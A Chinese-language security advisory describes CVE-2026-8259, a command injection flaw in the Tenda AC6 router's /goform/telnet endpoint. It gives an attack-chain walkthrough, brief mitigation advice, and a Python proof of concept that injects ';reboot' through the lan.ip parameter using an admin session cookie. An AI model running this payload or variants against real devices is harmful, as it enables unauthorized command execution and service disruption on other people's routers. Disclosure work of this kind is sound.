CVE-2026-8259 Tenda AC6 OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-8259

漏洞类型

OS命令注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC6

漏洞概述

Tenda AC6 路由器在版本 2.0/15.03.06.23 中存在操作系统命令注入漏洞。该漏洞位于 httpd 组件的 /goform/telnet 接口，由于对参数 lan.ip 缺乏严格的过滤，高权限攻击者可利用此漏洞在系统上执行任意操作系统命令，导致机密性、完整性和可用性受损。

技术细节

该漏洞源于 Tenda AC6 路由器 httpd 组件中 /goform/telnet 接口对用户输入的验证不足。具体而言，当处理包含 lan.ip 参数的请求时，程序直接将该参数的值拼接进系统命令中执行，未对特殊字符进行过滤。攻击者需具备高权限（如管理员账号）访问接口，通过构造包含 shell 元字符（如分号或管道符）的恶意 payload，即可欺骗后端执行注入的任意操作系统命令。这可能导致攻击者获取设备控制权、读取敏感文件或造成服务拒绝。

攻击链分析

STEP 1

1. 获取访问权限

攻击者需要获取路由器的高权限账号（如管理员密码），因为漏洞利用需要高权限（PR:H）。

STEP 2

2. 构造恶意Payload

攻击者构造包含Shell元字符（如 ; | `）的恶意数据，赋值给 lan.ip 参数，旨在拼接并执行系统命令。

STEP 3

3. 发送恶意请求

攻击者向 /goform/telnet 接口发送包含恶意 lan.ip 参数的POST请求。

STEP 4

4. 执行系统命令

服务器端未过滤特殊字符，直接执行拼接后的命令，攻击者从而获得操作系统层面的控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip, cookie):
    # Target endpoint
    url = f"http://{target_ip}/goform/telnet"
    
    # Malicious payload injecting a command to reboot the device
    # The vulnerability is in the 'lan.ip' parameter
    data = {
        "lan.ip": ";reboot" 
    }
    
    # Headers simulating an authenticated admin session (PR:H)
    headers = {
        "Cookie": cookie
    }
    
    try:
        response = requests.post(url, data=data, headers=headers, timeout=5)
        if response.status_code == 200:
            print("[+] Payload sent successfully.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

# Example usage
# exploit("192.168.0.1", "user=admin")

影响范围

Tenda AC6 2.0/15.03.06.23

防御指南

临时缓解措施

建议立即断开受影响设备的外部网络连接，仅允许信任的内网IP访问管理后台。如无法立即升级固件，应暂停使用该设备的管理功能，直到厂商发布安全补丁。